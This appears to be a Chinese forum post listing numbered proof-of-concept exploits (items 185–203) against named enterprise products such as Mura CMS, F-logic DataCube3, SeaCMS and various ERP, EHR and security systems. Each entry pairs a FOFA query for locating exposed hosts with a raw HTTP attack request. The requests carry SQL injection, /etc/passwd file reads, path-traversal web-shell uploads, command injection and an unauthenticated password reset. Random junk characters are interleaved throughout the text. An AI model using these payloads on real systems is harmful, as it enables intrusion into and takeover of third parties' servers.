' c/ T$ D7 A0 Q1 P. Sversion < 7.0.5.11 }, Z2 N- D, W F- ~& [
FOFA:app="REALOR-天翼应用虚拟化系统"7 ?# O( H- d$ v& L; o: J
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.12 N8 i. i$ t8 W/ v/ I( M
Host: host
$ s6 f. u' ~5 q x* ]9 \+ o8 A# l6 ~* N8 X$ b& s" p
4 r; F4 p1 ~' z! M- Z7 s2 [
186. F-logic DataCube3 SQL注入
# N1 |2 Z' d% W) s- f# | d# ?CVE-2024-31750
6 Q9 Z1 I0 g- J7 bF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统' f- K: M- D' e, |; u! Q }& C
FOFA:title=="DataCube3"
- C3 l; Q' X1 l. A* WPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
8 u0 t7 K9 d3 X; F# Q+ g9 QHost: your-ip
& f; a( t) S8 i9 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
4 h& }& s1 m1 B7 n; ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
4 e \- V3 s% z6 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 Z/ I0 h( Q1 a! D* s8 wAccept-Encoding: gzip, deflate
, f( u7 a" Z; eConnection: close! u1 g9 O' X: o- r7 h( e5 v
Content-Type: application/x-www-form-urlencoded
+ t: L! q4 {, z% A! ?4 Q& y: H1 c. K
5 X$ c- q" e. a* }7 l2 x! qreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
! D0 r; \/ h, q, e; I7 N5 s9 E* t+ e. l1 ~4 p
]& g) `) a& I% V) S# Y, S
187. Mura CMS processAsyncObject SQL注入$ Y+ O* e- r' d& g2 w
CVE-2024-32640. E7 ]5 B U/ ^( n
FOFA:"Mura CMS"
$ |) Q3 z8 W. B) n; t" wPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
- W4 E' h1 x$ c: R ?0 y1 VHost: your-ip* E- X. a1 T, ~; P( v# g+ b
Content-Type: application/x-www-form-urlencoded6 U6 \9 J* ^8 z+ q" k0 D; g! i2 z' Y
1 [6 X( O; K7 P; ~( }" ?
9 B- Y: y4 c# |9 \object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
0 S# l+ j s2 T9 A0 X8 Q
1 E' | _& P" X
) u2 p( ^5 Z4 Q188. 叁体-佳会视频会议 attachment 任意文件读取6 ]. v$ j" k, F N- [! {
version <= 3.9.7
% p* A9 _0 F. H: Y& W, PFOFA:body="/system/get_rtc_user_defined_info?site_id"
7 w& o8 V8 N/ B% C( b- f( xGET /attachment?file=/etc/passwd HTTP/1.1
2 ]* F5 e& \$ i# oHost: your-ip7 m$ R4 h6 Q8 [4 [0 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 e' t' l& o4 n; |2 c mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* ] [! U. R* q- c# s9 X
Accept-Encoding: gzip, deflate
0 F* H; z$ y) E+ TAccept-Language: zh-CN,zh;q=0.9,en;q=0.82 t8 l$ I v* L1 y
Connection: close
: W/ l7 t" v& s$ L$ @: v+ X
/ M* n0 n2 t* B8 G7 m# p7 n* ]' Z& ~
189. 蓝网科技临床浏览系统 deleteStudy SQL注入+ m; z- y) S# r/ ^! i
FOFA:app="LANWON-临床浏览系统"9 p. f3 A; C* X/ d3 |9 G. |
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
$ a3 p1 D1 T, a2 b% nHost: your-ip3 |: V; G( R8 ?. D" c& i% b$ x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 s. c, Q% Q+ w' U, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! E% F6 J% T3 Q: t3 w
Accept-Encoding: gzip, deflate
O) r6 F" o# D. @4 ZAccept-Language: zh-CN,zh;q=0.9
~3 `( d& K9 ~ [" PConnection: close1 s# p1 ~0 P5 |5 D3 q
% n, E- F0 F- M0 d' C' R
5 `% v" D4 q c' V& l190. 短视频矩阵营销系统 poihuoqu 任意文件读取
' b6 x H/ O" q! S- sFOFA:title=="短视频矩阵营销系统": l+ g1 G, A: t% p' V( U
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
3 S$ V1 I8 d# Y" |Host: your-ip' X3 ~, p! g' A/ u3 R' A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
& b/ ]* V( l! u5 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! Q: E+ V+ I# E7 a) q/ GContent-Type: application/x-www-form-urlencoded4 t2 Q2 @4 q8 W& D7 O9 C8 D5 I5 j, w
Accept-Encoding: gzip, deflate
7 \! w8 ]6 {. A. W8 ^Accept-Language: zh-CN,zh;q=0.9
0 d- Q$ f- H0 P y
5 N+ j, l2 k, v5 h- Spoi=file:///etc/passwd' ~+ {2 l: F) ]3 M
& a9 R; N3 v% _- b- v2 l
4 P" ]/ G9 x+ W0 ^+ I' z" b191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入1 t' S( W7 B7 }4 V" v; T, n
FOFA:body="/CDGServer3/index.jsp"
! }" F) J/ \1 LPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
) V. g6 l0 }% M( B' jHost: your-ip. v7 f# r2 t/ Z- r; Z3 P! J) |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 a% ]7 E1 W/ c' [% q7 g, LContent-Type: application/x-www-form-urlencoded
( ~/ `1 c" A; W. H7 u* s/ e |0 ` p
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=5 |% o. t' T: c9 C+ L
' I6 G. V3 s! h" T e7 V
8 n0 s4 u* _6 |$ k) G
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 w3 w6 C \* ~! ?9 g2 _ m
FOFA:title="用户登录_富通天下外贸ERP"4 P8 n* P/ k0 J& n3 V
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
( q: c. L9 ~ @7 y! [) OHost: your-ip. |. O: S$ i* ]0 F8 G2 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! Q* }& D# W9 D( p; `
Content-Type: application/x-www-form-urlencoded
6 w3 b5 d% a9 X+ {9 f' T
& |- G2 G1 U L8 f; y0 ]* L* B
' @$ |# C3 W7 a! [+ O" H) R( G<% @ webhandler language="C#" class="AverageHandler" %>
( Y2 k6 a1 r4 ?# ^" susing System;
# R5 I+ q# [8 x9 Lusing System.Web;" G1 T: {/ W% H$ R7 Y& |- [7 \
public class AverageHandler : IHttpHandler
# |3 w" d$ s. Q( h" b4 s- U0 j{8 D% ~3 V' C: r' G4 N
public bool IsReusable8 B3 C4 o& L4 X3 }9 ~0 W7 U
{ get { return true; } }6 o T& o. t/ W" J: n
public void ProcessRequest(HttpContext ctx)
2 W$ z7 @! e, `{
) m, {1 t: T# }0 vctx.Response.Write("test");' g0 ^8 {% _% j
}; N0 l( y. D0 Q/ N0 n7 e
}( X; Q2 i- _4 b; Y
, j5 W+ n1 L. x4 }$ R7 g! N) F- D% H
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
" \* k5 x% I) {- w* y% WFOFA:body="山石云鉴主机安全管理系统"
# t: ]- b, e, b8 L' ~GET /master/ajaxActions/getTokenAction.php HTTP/1.14 E& e# G6 K' r, b% p
Host:( a) b8 g; e( b4 b
Cookie: PHPSESSID=2333333333333;
# b) Y7 V0 \9 N' n, u HContent-Type: application/x-www-form-urlencoded
+ ]" W: c- H7 r3 c9 ]User-Agent: Mozilla/5.0
" o! `2 c! y9 E; T' c% R. Z( I! C
* v! q* M$ C# w
2 C5 @4 j: t! x5 |6 N6 u/ }3 MPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
! m& `5 \4 A6 k( z4 gHost:
, j P: Y* h+ |User-Agent: Mozilla/5.0
3 u4 s( C, q) n6 m8 d' p7 V" FAccept-Encoding: gzip, deflate
% P G9 k- q! X R3 \" OAccept: */*
6 `! d+ _- @2 t6 ]9 m) @) w' KConnection: close1 S- J: f1 m& j; ]
Cookie: PHPSESSID=2333333333333;
. l- a$ }! ]" R3 i& `6 R8 R$ zContent-Type: application/x-www-form-urlencoded* x% n/ d6 o9 o( {" E
Content-Length: 84! r* ~# n; O$ Q" s
9 H- K* S: o; W/ a, N
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
8 A0 j% {3 n- \1 G0 c7 X, I" C% a5 B5 g% F, C' V+ N
8 Z) n* U2 P/ c" p, c( O6 p& }; R
GET /master/img/config HTTP/1.1
) L) J6 J0 t& l! b7 _5 ZHost:
$ z0 a2 P/ u! f+ zUser-Agent: Mozilla/5.0
) G2 F0 r0 o( Q2 U8 S
* G; A( c8 l; ` H$ o; A# X8 O, r4 e$ \ b
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传. L b0 j2 E6 S
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在; V) s) C/ P; |# J I ]" A
( n0 M! q7 D" `7 D$ {- n, \: [POST /servlet/uploadAttachmentServlet HTTP/1.1
5 b0 A6 x8 L9 [; XHost: host5 d% j: [" P, {3 ?2 q. G+ \* V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0 T& X9 E: u9 L; h% y5 ~4 M1 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 v9 j2 |! t- s+ k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" ^7 H; H! U' l7 e7 B
Accept-Encoding: gzip, deflate9 o- y l5 t# N. _$ D" t
Connection: close
/ R/ E( R, z$ d/ f! O( J' B8 m$ ~2 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk* \$ p. T) F9 R9 I+ P
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
: j% w( {3 P8 }; Y- P/ `7 \5 d" A6 A% ~6 g- n* i K
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
# b. }8 O3 M) y: N0 D+ {Content-Type: text/plain K1 e) R7 U: \) R4 N" b$ v
<% out.println("hello");%>8 g# ?( U) E0 K i. }# D. O9 j
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
( e" G9 s# K6 M; VContent-Disposition: form-data; name="json"
& G5 C G8 C+ h Q& x1 ^ {"iq":{"query":{"UpdateType":"mail"}}}4 G* J# t: H/ A5 }: q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
5 O$ ?: B, z5 ^9 t3 h) u# X9 w/ T6 g7 Y' u
% r6 d3 h% J2 A9 l& z( m195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
c+ }% ~9 i8 IFOFA:title=="飞鱼星企业级智能上网行为管理系统5 N& s. N/ m" x3 F6 t2 ^
POST /send_order.cgi?parameter=operation HTTP/1.1
- k9 l3 m B$ Y9 b0 \% E- B& j3 DHost: 127.0.0.1
9 G8 c! j. {) j/ w4 w6 g/ E" qPragma: no-cache& Y2 ~# {8 D) p5 L% R: a
Cache-Control: no-cache$ |, z( J: q& m! I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 j A- A# a6 E; t u% MAccept: */*. ~/ L$ d( x5 c. j) h$ N5 X
Accept-Encoding: gzip, deflate
K) t5 p0 e* ~6 EAccept-Language: zh-CN,zh;q=0.9; ~- X* ?% G3 @. v9 T
Connection: close
* Y4 L$ f3 q: ]& k* I) H* d9 iContent-Type: application/x-www-form-urlencoded& l# b& |; b& `
Content-Length: 683 |/ B& |. F- |% j2 c7 g
2 B w( } S8 X; X1 a) A+ R( k
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}$ l9 {1 u: B. }
, c4 h% i/ j) t( Q) k# p) e) J/ h4 @
: B \) j& ]3 J( G196. 河南省风速科技统一认证平台密码重置
) c6 k0 Y! v* p7 H6 Y) I. MFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
" B# ^* ]. z, L/ d5 yPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1' _3 O8 K% a) z* G, P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ b! m M* A) Z- ~* d X8 X4 S8 J
Content-Type: application/json;charset=UTF-82 a e r6 N$ P1 I
X-Requested-With: XMLHttpRequest
! A; @/ [: x' ^8 P- q. S; j: QHost:( e8 G2 P: \6 W+ y3 T+ A, T) ~" o
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
& L6 r9 s# a! u7 s; Q3 p" x; {Content-Length: 451 ~+ [( t7 ~' [* j
Connection: close4 A6 y- [- Z8 d! G- y/ e: M. A- X- k
. x$ n6 I6 V9 a) u
{"xgh":"test","newPass":"test666","email":""}
, `2 a* P8 t: \$ z% [7 h
$ Q& B* ~. z3 ?( }+ d( ]
. ]" z* `8 b( C9 {, p6 K% G3 s8 k- K" b8 ]
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入 q& z3 I1 J" J5 d
FOFA:app="浙大恩特客户资源管理系统"
- L' e. P, D8 k- m$ oGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
0 S" V7 }6 T) [; Z' Q8 D. {Host:+ o8 p( A1 p' H* b4 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
c2 F Z! L, b1 Y" I" HAccept-Encoding: gzip, deflate1 W% `5 h; F& }, V$ j& e. q
Connection: close
7 D& V+ k% g9 y
& I# ?: k( ?- H+ f# J- I R, R9 P( X; w4 M$ M% K
+ U3 N) A0 F) k$ H1 t: w% g198. 阿里云盘 WebDAV 命令注入, ?- P6 p! c6 P( u' X4 h7 ^ [% e
CVE-2024-296406 y) I) h2 p/ L+ N9 D. E& [9 [7 V0 X
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1( Y4 }% o/ E- f" ?1 ^, _
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64) [/ X/ @5 D4 _, o+ ]5 `
Accept: */*" g& }% C, R# ]8 S* Z) H$ j
Accept-Encoding: gzip, deflate
/ _" `5 y7 p" m( m8 B+ l+ fAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6, g1 {: o/ c( y$ d+ {
Connection: close
: ]7 q' G. m( {' b; M ~% M
+ f' R. N, I7 `5 r6 Q4 q9 L x2 n% a4 w8 R
199. cockpit系统assetsmanager_upload接口 文件上传
: n |* W+ A* P, a
7 [6 x6 k" w3 @# k o7 e/ V: E1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
( K ]5 s4 p. g5 J" x" fGET /auth/login?to=/ HTTP/1.1
$ S# G! G# V/ {; K2 F ^ K, G) r1 R8 s6 A) h, E
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw": P+ e, f# O* F6 l7 ~' v' E; q
3 O/ g: t* f, C) ]2.使用刚才上一步获取到的jwt获取cookie:; K4 v4 l4 D7 y# l6 c M
! i; P" e) f6 {3 @, D: B H1 BPOST /auth/check HTTP/1.1
: L. I6 c- P( V) G0 `9 ~Content-Type: application/json
- q& r9 a( D8 c2 [/ K3 G5 _) Z$ S) X/ {/ ]6 W; M6 g
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
) [5 Y" D8 O' p5 E) x$ z% w! l7 F) i
响应:200,返回值:
4 |0 b% E* {- P" L2 B0 c0 m/ i mSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/+ I; ?6 w" w3 {5 L
Fofa:title="Authenticate Please!": v4 N% A4 W6 M8 w0 C# V' B6 v
POST /assetsmanager/upload HTTP/1.13 N& t( _! E8 y% R* J$ T5 K
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
; f. _8 E; H+ U9 g9 M6 iCookie: mysession=95524f01e238bf51bb60d77ede3bea92% n% T0 c! i7 K$ W% c% n8 S" l
- d+ Z$ o$ O% R4 d; [0 K7 x
-----------------------------36D28FBc36bd6feE7Fb3
. W- T4 Y: @4 k9 g) rContent-Disposition: form-data; name="files[]"; filename="tttt.php"
0 h; v; y# [2 }: ^* O1 GContent-Type: text/php
2 x0 k3 O. b: X7 y8 l5 R$ [: O O5 Z; y
<?php echo "tttt";unlink(__FILE__);?>. r" j0 u6 Y9 t- s" v# s' u4 Z
-----------------------------36D28FBc36bd6feE7Fb3) d& N% P- f# t
Content-Disposition: form-data; name="folder"# B# P- I# L7 }4 u$ D' [
$ t, T; I& e2 X$ |/ d1 [
-----------------------------36D28FBc36bd6feE7Fb3--# n% Q; G, [7 F( q: }
+ R4 A; _, }: ~; C+ ]
+ }4 }7 L* n2 M. u/storage/uploads/tttt.php5 \2 @% q) V: f* g: o7 J
8 ]3 q) u2 H+ X9 \
200. SeaCMS海洋影视管理系统dmku SQL注入
' o. `! V- p4 i jFOFA:app="海洋CMS"
6 I& K3 ^/ m3 G9 H: P( n. w" _$ H, vGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
1 a: H) S+ L8 N8 h: ?Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
' L2 b% a! Z. G' K" n1 B8 \Upgrade-Insecure-Requests: 1) M7 B5 v$ [0 X$ L; ]' E/ f
Cache-Control: max-age=0
8 ^% a4 O+ k! G# WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 C# v1 |( b( r0 M5 G
Accept-Encoding: gzip, deflate# } Q W7 q! W4 k
Accept-Language: zh-CN,zh;q=0.9
. G3 ?" i. @; n: T: @2 w' I- K2 T$ h3 k N8 F! N+ i
. J# w& i" D8 x) K& m% m! q; F( ]
201. 方正全媒体新闻采编系统 binary SQL注入/ N" i0 D* W! P. y
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"; e& ^* p+ w% z+ E% v0 S
POST /newsedit/newsplan/task/binary.do HTTP/1.1% L% u) I) g3 ~7 g- U/ i
Content-Type: application/x-www-form-urlencoded
4 X! I9 R; T3 U. b" @' a8 c9 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" l1 B* \4 M4 J9 `' J6 OAccept-Encoding: gzip, deflate
1 \* |7 o' A' u# d! k8 {4 HAccept-Language: zh-CN,zh;q=0.9
- t( |% M3 a* w# H+ ?: uConnection: close
1 v) Z' P( p) ~7 u; L
! c8 o1 q, W3 d" u/ k" n0 tTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
a/ M& s2 e' l
0 F% ?8 J9 L+ L% ~" _+ v* r' |. N9 C( D+ c
202. 微擎系统 AccountEdit任意文件上传
2 ]6 `3 r7 Y" E- R3 ]) ~! \9 ^5 ?FOFA:body="/Widgets/WidgetCollection/"6 A; V. e5 y$ {. c
获取__VIEWSTATE和__EVENTVALIDATION值
$ j0 f3 p4 v" b' z9 jGET /User/AccountEdit.aspx HTTP/1.1
" C. F# X5 L: I( j) H+ nHost: 滑板人之家
4 u& I1 D( X1 h0 G: AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
) V; W) b: E. ?, H/ |6 PContent-Length: 0, M/ \/ ^3 Z u5 [0 ^% ~: }( [( Q
( x3 h0 |( S- d4 b- {9 C% _6 J' Q/ _. }) S
替换__VIEWSTATE和__EVENTVALIDATION值
# O N4 `+ ?- M) t4 gPOST /User/AccountEdit.aspx HTTP/1.1+ b2 ?# k9 |3 n! a" r# O4 r
Accept-Encoding: gzip, deflate, br+ K7 @1 [3 N8 n. I; m4 @
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687! r6 C+ {! s$ A5 ]9 u; F9 F9 r
* t2 z: x' Y! y( _$ ^8 @
-----------------------------786435874t38587593865736587346567358735687
# W. j$ U; H7 C- l4 P* oContent-Disposition: form-data; name="__VIEWSTATE"
% D" t. L* a" e9 ?8 d. ?3 D+ Z# l" I- E8 x
__VIEWSTATE
1 [ R1 v: |" K. J9 J. L) K+ r-----------------------------786435874t38587593865736587346567358735687
3 B6 @9 T. Y6 m+ G6 s2 fContent-Disposition: form-data; name="__EVENTVALIDATION"
( [0 o- {5 N3 G. P [9 `5 |/ F3 C8 ]: _( J
__EVENTVALIDATION
2 I* k2 f3 O* D* `8 f5 i5 R/ L-----------------------------786435874t38587593865736587346567358735687; }7 \( a E/ m% V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
# p5 j+ Q* J3 ?6 J/ {Content-Type: text/plain% i. k6 g' C7 ~/ e8 e" V, I, v
2 Z) |3 J' f5 {( NHello World!: x5 e3 r A8 V* Y, ?4 }
-----------------------------786435874t38587593865736587346567358735687
& Y2 O" L7 `/ |5 g* Q, bContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
" y( l& u( N2 j" z
4 \: [7 m( A) `" i- \上传图片
7 T" C4 T& [0 K. }! [-----------------------------786435874t38587593865736587346567358735687: P' O# @5 S9 S5 I* ]& a
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"5 N! {5 w! Q7 |7 S8 {3 F7 B: _
1 E4 d3 D4 _0 z4 M: y T( R) N' [$ P$ C/ D: H; S: r! _
-----------------------------786435874t38587593865736587346567358735687
( `4 w/ d, p1 v2 p, S% {Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"% F8 @; t' @8 l9 I% m" q
# v. F- {: ~6 g: T `
5 A. V, n2 U+ Q- D-----------------------------786435874t38587593865736587346567358735687--
6 ~/ R+ L' Z; b a4 q6 o/ j/ x6 q2 U6 t* d; B) `; b% p* c
+ P8 r7 [, m9 H: T. {; D( H/_data/Uploads/1123.txt( N* W0 C7 S" m% O1 j* z
6 V$ Y6 k6 J0 G203. 红海云EHR PtFjk 文件上传 F2 O0 `8 m4 I) P' v% [- y
FOFA:body="RedseaPlatform"4 I$ \8 \8 p! {# b$ i
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
/ U2 c( K, T$ h" F+ t8 z( kHost: x.x.x.x
+ I' X! {" i. b; J& B6 z" LAccept-Encoding: gzip
& R, G+ x/ p2 y2 J: cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 \ g2 B4 y4 T: N8 H L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
`4 a6 w* D w( C( a! ^+ @ mContent-Length: 210
# P$ P/ ]5 Q! b5 o- N" i) v* A) W# U6 d# Q
------WebKitFormBoundaryt7WbDl1tXogoZys4" ]6 n& f; w# c1 b5 Z) D6 C
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"# g3 y, L% z" I# c z
Content-Type:image/jpeg% ~- i5 Z/ D f5 C
, `$ ~& G4 C' d: q( W<% out.print("hello,eHR");%>4 e5 S7 P9 Z8 |& h3 h W# o
------WebKitFormBoundaryt7WbDl1tXogoZys4--+ _. X* s" p" |# Y% D$ Y
- J! k- \ r% v
( B+ u) Z& l, h/ f! G
$ E7 p/ }( K8 x' U N$ K1 J; f# y7 r9 V: `% \' ^3 W3 A! I
" H! g i. b* Y& \
* q9 @* r4 M$ P6 E) u
|
发表于 2024-6-5 14:31:29
收藏
支持
反对